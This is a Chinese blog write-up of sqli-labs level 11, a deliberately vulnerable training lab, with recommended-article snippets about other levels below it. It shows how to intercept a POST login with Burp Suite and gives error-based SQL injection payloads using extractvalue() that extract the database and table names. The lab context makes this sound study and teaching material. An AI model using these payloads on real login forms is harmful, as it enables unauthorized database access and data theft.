SQLI DUMB SERIES-11 及 Burp Suite Professional的简易使用方法

最新推荐文章于 2023-02-13 17:23:11 发布
最新推荐文章于 2023-02-13 17:23:11 发布
阅读量426 收藏 1
点赞数
分类专栏: SQLI DUMB SERIES闯关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42395917/article/details/101265349
版权

11关为POST提交 

则我们可以借助工具:BurpLoader

将浏览器设置代理为127.0.0.1

在Burploader中设置代理

在其中添加 127.0.0.1:8080 并在前方的Running复选框打上勾

在工具中打开拦截

此时我们在浏览器中的任何数据都会被拦截

在数据报中右键选择Send to Repeater

我们再进入Repeater选项卡然后修改数据包后 点GO发送

uname=admin'&passwd=admin&submit=Submit

发送后报错

单引号成功构造闭合

uname=admin' order by 2 --+&passwd=admin&submit=Submit

extractvalue() :对XML文档进行查询的函数

语法:extractvalue(目标xml文档,xml路径)

uname=admin' and extractvalue(1,concat(0,(select database())))--+&passwd=admin&submit=Submit

 

uname=admin' and extractvalue(1,concat(0,(select table_name from information_schema.tables where table_schema='security')))--+&passwd=admin&submit=Submit
i_momoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入
最新发布
Superstacks超全栈
06-09 664
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名。获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
SQLI DUMB SERIES-11
weixin_34324081的博客
04-10 281
(1)检测构造方式 由此看出输入的用户名以及密码都被一对单引号所包含。 方法一: (2) 模拟真实环境,以用户的身份登录。 (3)用burp抓包。开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater. (4)打开burp的repeater页面,修改post参数,测试是否存在报错注入。 说明存在报错型注入。 (5)可用extr...
sqli-labs搭建闯关+蚁剑安装
不知名白帽的博客
05-26 1369
sqli-labs靶场的搭建,蚁剑的下载和安装,burpsuite的下载与破解,以及sqli-labs中的less-1(联合注入,报错注入),less-8(布尔盲注),less-9(时间盲注),less-11(POST注入),less-18(UA注入),less-20(COOKIE注入),less-33(宽字节注入),less-38(堆叠注入)等典型关卡...
SQLI DUMB SERIES-1
weixin_33738578的博客
03-01 2994
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果:   现在可知,“ ' ”并没有被过滤,因此...
burp suite爆破sqli-labs的 less-5
程序员阿飘 的博客
01-08 187
Payload sets中的 from 0 , to 127,还要加上步长 1 ,截图的时候没有注意!
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
SQLi-Query-Tampering:SQLi查询篡改在Burp Suite的Intruder中进行了扩展,并添加了自定义的Payload GeneratorProcessor。 此扩展使您可以使用多种强大的规避技术灵活地进行手动测试
04-12
SQLi查询篡改在Burp Suite的Intruder中进行了扩展,并添加了自定义的有效负载生成器/处理器。 优点和好处 Sqlmap是用于SQL漏洞的出色的自动化工具,但是当您进行渗透测试或bug搜索时,它可能会有点嘈杂! Sqlmap的很...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
手工和burp两种方式的布尔盲注及Sqli-labs Less 8
信安小菜鸡的博客
04-29 573
布尔盲注 开发人员屏蔽了报错信息,只返回真假的两种情况能够进行布尔盲注 布尔盲注的关键点在于将表达式结果与已知值进行对比,根据对比结果判断正确与否 布尔盲注的判断方式 通过长度判断 length():length(database())>=x 通过字符判断 substr():substr(database(),1,1) =‘s’ 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x Sqli-labs Less 8实践 判断数据库名长度 此处采
【SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2455
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
Burpsuite系列 -- SQLiPy插件使用
weixin_41489908的博客
05-22 1990
心眼这个东西,如果你想多了就是小心眼,想少了就是缺心眼,一直想呢就是死心眼,不想就是没心眼。。。。 ---- 网页云热评 提醒:公众号有视频版 一、SQLIPy插件介绍 该插件可以把burp抓到的请求包直接利用sqlmap扫描,下载地址:https://github.com/portswigger/sqli-py 二、安装Jython, 由于sqlmap是Python语言编写的,而burp是java编写的所以需要先下载jython-standalone-2.7.0.jar文件 1、下载地..
使用burpsuite抓包 + sql工具注入 dvwa初级靶场
太阳照耀我走四方
02-13 2365
第一次burpsuite + sqlmap 抓包拿flag
DVWA系列(六)——使用Burpsuite进行SQL Injection(SQL注入)
热门推荐
橘子女侠
05-06 1万+
1. SQL注入简介 (1)SQL注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; (2)SQL注入漏洞类型 字符型; 数字型; 搜索型; (3)SQL注入的过程 判断是否存在注入,注入是字符型还是数字型; 猜解SQL查询语句中的字段数; 确定显示位置; 获取当前数据库;获取数据库中表; 获取表中的字段名; 下载数据; 2....
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 393
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
求助:火狐浏览器使用 本地代理后无法连接网络的解决方法
冰点的博客
05-15 2659
一、问题描述:直接打开火狐浏览器浏览网页正常,使用火狐代理插件foxyProxy使用本地127.0.0.1后,网页出现下面的提示:当前浏览器网络和系统网络的设置情况如下:火狐浏览器版本:根据网络上提供的解决方案,无法排除故障,希望看到的朋友帮忙解决一下,不甚感谢! ...
SQLI DUMB SERIES-20
weixin_34318272的博客
04-14 202
(1)登录成功后页面: (2)登录成功后,用burp开始抓包,刷新浏览器页面,将会跳出如下页面 (3)根据各种提示,知道需要从cookies入手,寻找闭合方式 闭合方式为单引号。注释符也可以用 (4)开始注入;可用报错注入,方法同前面的一样,例如:爆库名 uname=admin1' and extractvalue(1,concat(0x7e,(select data...
sqli dumb series-1
03-16
sqli dumb series-1是一个SQL注入漏洞测试平台,用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例,用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值